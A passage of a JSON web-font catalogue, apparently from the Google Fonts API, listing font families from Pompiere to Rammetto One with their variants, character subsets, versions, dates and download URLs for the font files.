      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pompiere/v10/VEMyRoxis5Dwuyeov6Wt5jDtreOL.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pontano Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pontanosans/v8/qFdD35GdgYR8EzR6oBLDHa3qwjUMg1siNQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Poor Story",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/poorstory/v8/jizfREFUsnUct9P6cDfd4OmnLD0Z4zM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Poppins",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v15",
      "lastModified": "2020-11-06",
      "files": {
        "100": "http://fonts.gstatic.com/s/poppins/v15/pxiGyp8kv8JHgFVrLPTed3FBGPaTSQ.ttf",
        "100italic": "http://fonts.gstatic.com/s/poppins/v15/pxiAyp8kv8JHgFVrJJLmE3tFOvODSVFF.ttf",
        "200": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLFj_V1tvFP-KUEg.ttf",
        "200italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLmv1plEN2PQEhcqw.ttf",
        "300": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLDz8V1tvFP-KUEg.ttf",
        "300italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLm21llEN2PQEhcqw.ttf",
        "regular": "http://fonts.gstatic.com/s/poppins/v15/pxiEyp8kv8JHgFVrFJDUc1NECPY.ttf",
        "italic": "http://fonts.gstatic.com/s/poppins/v15/pxiGyp8kv8JHgFVrJJLed3FBGPaTSQ.ttf",
        "500": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLGT9V1tvFP-KUEg.ttf",
        "500italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLmg1hlEN2PQEhcqw.ttf",
        "600": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLEj6V1tvFP-KUEg.ttf",
        "600italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLmr19lEN2PQEhcqw.ttf",
        "700": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLCz7V1tvFP-KUEg.ttf",
        "700italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLmy15lEN2PQEhcqw.ttf",
        "800": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLDD4V1tvFP-KUEg.ttf",
        "800italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLm111lEN2PQEhcqw.ttf",
        "900": "http://fonts.gstatic.com/s/poppins/v15/pxiByp8kv8JHgFVrLBT5V1tvFP-KUEg.ttf",
        "900italic": "http://fonts.gstatic.com/s/poppins/v15/pxiDyp8kv8JHgFVrJJLm81xlEN2PQEhcqw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Port Lligat Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/portlligatsans/v9/kmKmZrYrGBbdN1aV7Vokow6Lw4s4l7N0Tx4xEcQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Port Lligat Slab",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/portlligatslab/v9/LDIpaoiQNgArA8kR7ulhZ8P_NYOss7ob9yGLmfI.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pragati Narrow",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v7",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pragatinarrow/v7/vm8vdRf0T0bS1ffgsPB7WZ-mD17_ytN3M48a.ttf",
        "700": "http://fonts.gstatic.com/s/pragatinarrow/v7/vm8sdRf0T0bS1ffgsPB7WZ-mD2ZD5fd_GJMTlo_4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Prata",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "vietnamese"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/prata/v13/6xKhdSpbNNCT-vWIAG_5LWwJ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Preahvihear",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/preahvihear/v12/6NUS8F-dNQeEYhzj7uluxswE49FJf8Wv.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Press Start 2P",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/pressstart2p/v9/e3t4euO8T-267oIAQAu6jDQyK0nSgPJE4580.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Pridi",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "200": "http://fonts.gstatic.com/s/pridi/v6/2sDdZG5JnZLfkc1SiE0jRUG0AqUc.ttf",
        "300": "http://fonts.gstatic.com/s/pridi/v6/2sDdZG5JnZLfkc02i00jRUG0AqUc.ttf",
        "regular": "http://fonts.gstatic.com/s/pridi/v6/2sDQZG5JnZLfkfWao2krbl29.ttf",
        "500": "http://fonts.gstatic.com/s/pridi/v6/2sDdZG5JnZLfkc1uik0jRUG0AqUc.ttf",
        "600": "http://fonts.gstatic.com/s/pridi/v6/2sDdZG5JnZLfkc1CjU0jRUG0AqUc.ttf",
        "700": "http://fonts.gstatic.com/s/pridi/v6/2sDdZG5JnZLfkc0mjE0jRUG0AqUc.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Princess Sofia",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/princesssofia/v9/qWczB6yguIb8DZ_GXZst16n7GRz7mDUoupoI.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Prociono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/prociono/v10/r05YGLlR-KxAf9GGO8upyDYtStiJ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Prompt",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2019-07-17",
      "files": {
        "100": "http://fonts.gstatic.com/s/prompt/v4/-W_9XJnvUD7dzB2CA9oYREcjeo0k.ttf",
        "100italic": "http://fonts.gstatic.com/s/prompt/v4/-W_7XJnvUD7dzB2KZeJ8TkMBf50kbiM.ttf",
        "200": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2Cr_s4bmkvc5Q9dw.ttf",
        "200italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeLQb2MrUZEtdzow.ttf",
        "300": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2Cy_g4bmkvc5Q9dw.ttf",
        "300italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeK0bGMrUZEtdzow.ttf",
        "regular": "http://fonts.gstatic.com/s/prompt/v4/-W__XJnvUD7dzB26Z9AcZkIzeg.ttf",
        "italic": "http://fonts.gstatic.com/s/prompt/v4/-W_9XJnvUD7dzB2KZdoYREcjeo0k.ttf",
        "500": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2Ck_k4bmkvc5Q9dw.ttf",
        "500italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeLsbWMrUZEtdzow.ttf",
        "600": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2Cv_44bmkvc5Q9dw.ttf",
        "600italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeLAamMrUZEtdzow.ttf",
        "700": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2C2_84bmkvc5Q9dw.ttf",
        "700italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeKka2MrUZEtdzow.ttf",
        "800": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2Cx_w4bmkvc5Q9dw.ttf",
        "800italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeK4aGMrUZEtdzow.ttf",
        "900": "http://fonts.gstatic.com/s/prompt/v4/-W_8XJnvUD7dzB2C4_04bmkvc5Q9dw.ttf",
        "900italic": "http://fonts.gstatic.com/s/prompt/v4/-W_6XJnvUD7dzB2KZeKcaWMrUZEtdzow.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Prosto One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/prostoone/v9/OpNJno4VhNfK-RgpwWWxpipfWhXD00c.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Proza Libre",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/prozalibre/v5/LYjGdGHgj0k1DIQRyUEyyHovftvXWYyz.ttf",
        "italic": "http://fonts.gstatic.com/s/prozalibre/v5/LYjEdGHgj0k1DIQRyUEyyEotdN_1XJyz7zc.ttf",
        "500": "http://fonts.gstatic.com/s/prozalibre/v5/LYjbdGHgj0k1DIQRyUEyyELbV__fcpC69i6N.ttf",
        "500italic": "http://fonts.gstatic.com/s/prozalibre/v5/LYjZdGHgj0k1DIQRyUEyyEotTCvceJSY8z6Np1k.ttf",
        "600": "http://fonts.gstatic.com/s/prozalibre/v5/LYjbdGHgj0k1DIQRyUEyyEL3UP_fcpC69i6N.ttf",
        "600italic": "http://fonts.gstatic.com/s/prozalibre/v5/LYjZdGHgj0k1DIQRyUEyyEotTAfbeJSY8z6Np1k.ttf",
        "700": "http://fonts.gstatic.com/s/prozalibre/v5/LYjbdGHgj0k1DIQRyUEyyEKTUf_fcpC69i6N.ttf",
        "700italic": "http://fonts.gstatic.com/s/prozalibre/v5/LYjZdGHgj0k1DIQRyUEyyEotTGPaeJSY8z6Np1k.ttf",
        "800": "http://fonts.gstatic.com/s/prozalibre/v5/LYjbdGHgj0k1DIQRyUEyyEKPUv_fcpC69i6N.ttf",
        "800italic": "http://fonts.gstatic.com/s/prozalibre/v5/LYjZdGHgj0k1DIQRyUEyyEotTH_ZeJSY8z6Np1k.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Public Sans",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v4",
      "lastModified": "2020-06-26",
      "files": {
        "100": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuFpi5ww0pX189fg.ttf",
        "200": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymulpm5ww0pX189fg.ttf",
        "300": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuSJm5ww0pX189fg.ttf",
        "regular": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuFpm5ww0pX189fg.ttf",
        "500": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuJJm5ww0pX189fg.ttf",
        "600": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuyJ65ww0pX189fg.ttf",
        "700": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymu8Z65ww0pX189fg.ttf",
        "800": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymulp65ww0pX189fg.ttf",
        "900": "http://fonts.gstatic.com/s/publicsans/v4/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuv565ww0pX189fg.ttf",
        "100italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpRgQctfVotfj7j.ttf",
        "200italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673trRgActfVotfj7j.ttf",
        "300italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673toPgActfVotfj7j.ttf",
        "italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpRgActfVotfj7j.ttf",
        "500italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpjgActfVotfj7j.ttf",
        "600italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tqPhwctfVotfj7j.ttf",
        "700italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tq2hwctfVotfj7j.ttf",
        "800italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673trRhwctfVotfj7j.ttf",
        "900italic": "http://fonts.gstatic.com/s/publicsans/v4/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tr4hwctfVotfj7j.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Puritan",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/puritan/v12/845YNMgkAJ2VTtIo9JrwRdaI50M.ttf",
        "italic": "http://fonts.gstatic.com/s/puritan/v12/845aNMgkAJ2VTtIoxJj6QfSN90PfXA.ttf",
        "700": "http://fonts.gstatic.com/s/puritan/v12/845dNMgkAJ2VTtIozCbfYd6j-0rGRes.ttf",
        "700italic": "http://fonts.gstatic.com/s/puritan/v12/845fNMgkAJ2VTtIoxJjC_dup_2jDVevnLQ.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Purple Purse",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/purplepurse/v9/qWctB66gv53iAp-Vfs4My6qyeBb_ujA4ug.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Quando",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/quando/v9/xMQVuFNaVa6YuW0pC6WzKX_QmA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Quantico",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/quantico/v10/rax-HiSdp9cPL3KIF4xsLjxSmlLZ.ttf",
        "italic": "http://fonts.gstatic.com/s/quantico/v10/rax4HiSdp9cPL3KIF7xuJDhwn0LZ6T8.ttf",
        "700": "http://fonts.gstatic.com/s/quantico/v10/rax5HiSdp9cPL3KIF7TQARhasU7Q8Cad.ttf",
        "700italic": "http://fonts.gstatic.com/s/quantico/v10/rax7HiSdp9cPL3KIF7xuHIRfu0ry9TadML4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Quattrocento",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/quattrocento/v12/OZpEg_xvsDZQL_LKIF7q4jPHxGL7f4jFuA.ttf",
        "700": "http://fonts.gstatic.com/s/quattrocento/v12/OZpbg_xvsDZQL_LKIF7q4jP_eE3fd6PZsXcM9w.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Quattrocento Sans",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/quattrocentosans/v13/va9c4lja2NVIDdIAAoMR5MfuElaRB3zOvU7eHGHJ.ttf",
        "italic": "http://fonts.gstatic.com/s/quattrocentosans/v13/va9a4lja2NVIDdIAAoMR5MfuElaRB0zMt0r8GXHJkLI.ttf",
        "700": "http://fonts.gstatic.com/s/quattrocentosans/v13/va9Z4lja2NVIDdIAAoMR5MfuElaRB0RykmrWN33AiasJ.ttf",
        "700italic": "http://fonts.gstatic.com/s/quattrocentosans/v13/va9X4lja2NVIDdIAAoMR5MfuElaRB0zMj_bTPXnijLsJV7E.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Questrial",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v12",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/questrial/v12/QdVUSTchPBm7nuUeVf7EuStkm20oJA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Quicksand",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v21",
      "lastModified": "2020-06-26",
      "files": {
        "300": "http://fonts.gstatic.com/s/quicksand/v21/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkKEo18G0wx40QDw.ttf",
        "regular": "http://fonts.gstatic.com/s/quicksand/v21/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o18G0wx40QDw.ttf",
        "500": "http://fonts.gstatic.com/s/quicksand/v21/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkM0o18G0wx40QDw.ttf",
        "600": "http://fonts.gstatic.com/s/quicksand/v21/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkCEv18G0wx40QDw.ttf",
        "700": "http://fonts.gstatic.com/s/quicksand/v21/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv18G0wx40QDw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Quintessential",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/quintessential/v8/fdNn9sOGq31Yjnh3qWU14DdtjY5wS7kmAyxM.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Qwigley",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/qwigley/v10/1cXzaU3UGJb5tGoCuVxsi1mBmcE.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Racing Sans One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/racingsansone/v8/sykr-yRtm7EvTrXNxkv5jfKKyDCwL3rmWpIBtA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Radley",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v15",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/radley/v15/LYjDdGzinEIjCN19oAlEpVs3VQ.ttf",
        "italic": "http://fonts.gstatic.com/s/radley/v15/LYjBdGzinEIjCN1NogNAh14nVcfe.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rajdhani",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/rajdhani/v10/LDI2apCSOBg7S-QT7pasEcOsc-bGkqIw.ttf",
        "regular": "http://fonts.gstatic.com/s/rajdhani/v10/LDIxapCSOBg7S-QT7q4AOeekWPrP.ttf",
        "500": "http://fonts.gstatic.com/s/rajdhani/v10/LDI2apCSOBg7S-QT7pb0EMOsc-bGkqIw.ttf",
        "600": "http://fonts.gstatic.com/s/rajdhani/v10/LDI2apCSOBg7S-QT7pbYF8Osc-bGkqIw.ttf",
        "700": "http://fonts.gstatic.com/s/rajdhani/v10/LDI2apCSOBg7S-QT7pa8FsOsc-bGkqIw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rakkas",
      "variants": [
        "regular"
      ],
      "subsets": [
        "arabic",
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rakkas/v9/Qw3cZQlNHiblL3j_lttPOeMcCw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Raleway",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v18",
      "lastModified": "2020-09-30",
      "files": {
        "100": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvao4CPNLA3JC9c.ttf",
        "200": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtaooCPNLA3JC9c.ttf",
        "300": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVuEooCPNLA3JC9c.ttf",
        "regular": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaooCPNLA3JC9c.ttf",
        "500": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoooCPNLA3JC9c.ttf",
        "600": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpYCPNLA3JC9c.ttf",
        "700": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVs9pYCPNLA3JC9c.ttf",
        "800": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtapYCPNLA3JC9c.ttf",
        "900": "http://fonts.gstatic.com/s/raleway/v18/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtzpYCPNLA3JC9c.ttf",
        "100italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNPrQVIT9c2c8.ttf",
        "200italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejMPrQVIT9c2c8.ttf",
        "300italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4TbMPrQVIT9c2c8.ttf",
        "italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjMPrQVIT9c2c8.ttf",
        "500italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4VrMPrQVIT9c2c8.ttf",
        "600italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4bbLPrQVIT9c2c8.ttf",
        "700italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4Y_LPrQVIT9c2c8.ttf",
        "800italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejLPrQVIT9c2c8.ttf",
        "900italic": "http://fonts.gstatic.com/s/raleway/v18/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLPrQVIT9c2c8.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Raleway Dots",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ralewaydots/v8/6NUR8FifJg6AfQvzpshgwJ8kyf9Fdty2ew.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ramabhadra",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ramabhadra/v10/EYq2maBOwqRW9P1SQ83LehNGX5uWw3o.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Ramaraja",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/ramaraja/v5/SlGTmQearpYAYG1CABIkqnB6aSQU.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rambla",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/rambla/v8/snfrs0ip98hx6mr0I7IONthkwQ.ttf",
        "italic": "http://fonts.gstatic.com/s/rambla/v8/snfps0ip98hx6mrEIbgKFN10wYKa.ttf",
        "700": "http://fonts.gstatic.com/s/rambla/v8/snfos0ip98hx6mrMn50qPvN4yJuDYQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/rambla/v8/snfus0ip98hx6mrEIYC2O_l86p6TYS-Y.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Rammetto One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
